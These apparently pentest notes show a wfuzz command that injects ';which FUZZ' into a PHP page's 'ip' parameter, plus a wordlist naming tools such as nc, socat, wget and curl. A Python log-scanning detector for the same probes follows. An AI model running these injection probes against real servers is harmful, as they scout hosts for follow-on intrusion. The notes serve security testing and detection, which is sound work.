Enumerating Command Injection Capabilities
- Fuzzing for useful commands (each wordlist entry replaces FUZZ as the argument to which; --hc 404 hides 404 responses)
wfuzz -c -z file,capability_check_custom.txt --hc 404 "http://example.com/php/index.php?ip=127.0.0.1;which FUZZ"
- Contents of capability_check_custom.txt (one binary name per line)
wget
curl
fetch
gcc
cc
nc
socat
ping
netstat
ss
ifconfig
ip
hostname
php
python
python3
perl
java
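
- Detecting this enumeration in web server logs (added example, not part of the original notes)
The sweep above leaves a distinctive trail: one client requesting the same parameter with a shell separator followed by which and a different binary name each time. The sketch below flags such clients. It assumes combined-format access logs; the log lines, IP addresses, function name and threshold are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Binary names taken from the page's capability_check_custom.txt wordlist.
PROBED_TOOLS = set(
    "wget curl fetch gcc cc nc socat ping netstat ss ifconfig ip "
    "hostname php python python3 perl java".split()
)

# Client IP and request target of a combined-format access log line.
# The target is matched lazily up to " HTTP/x.y" so raw spaces survive.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>.+?) HTTP/[\d.]+"'
)

# A shell separator followed by "which <name>" in the decoded query string.
WHICH_RE = re.compile(r'(?:;|\|\||&&|\||&|`|\$\(|\n)\s*which\s+([A-Za-z0-9_.+-]+)')


def find_which_probes(log_lines, min_tools=3):
    """Return {client_ip: sorted binaries} for clients probing >= min_tools names."""
    seen = defaultdict(set)
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m or "?" not in m["target"]:
            continue
        # Decode once so %3B, %20 and + are compared in their literal form.
        query = unquote_plus(m["target"].split("?", 1)[1])
        for tool in WHICH_RE.findall(query):
            if tool in PROBED_TOOLS:
                seen[m["ip"]].add(tool)
    return {ip: sorted(tools) for ip, tools in seen.items() if len(tools) >= min_tools}


# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /php/index.php?ip=127.0.0.1;which%20wget HTTP/1.1" 200 31',
    '203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /php/index.php?ip=127.0.0.1%3Bwhich+curl HTTP/1.1" 200 31',
    '203.0.113.7 - - [10/Mar/2024:10:00:02 +0000] "GET /php/index.php?ip=127.0.0.1;which nc HTTP/1.1" 200 24',
    '198.51.100.4 - - [10/Mar/2024:10:00:05 +0000] "GET /php/index.php?ip=8.8.8.8 HTTP/1.1" 200 210',
    '198.51.100.4 - - [10/Mar/2024:10:00:09 +0000] "GET /docs?q=which+python+version HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, tools in find_which_probes(SAMPLE_LOG).items():
        print(f"{ip} probed for: {', '.join(tools)}")
```

The last sample line shows why the separator is required: a search query containing the word which is not flagged.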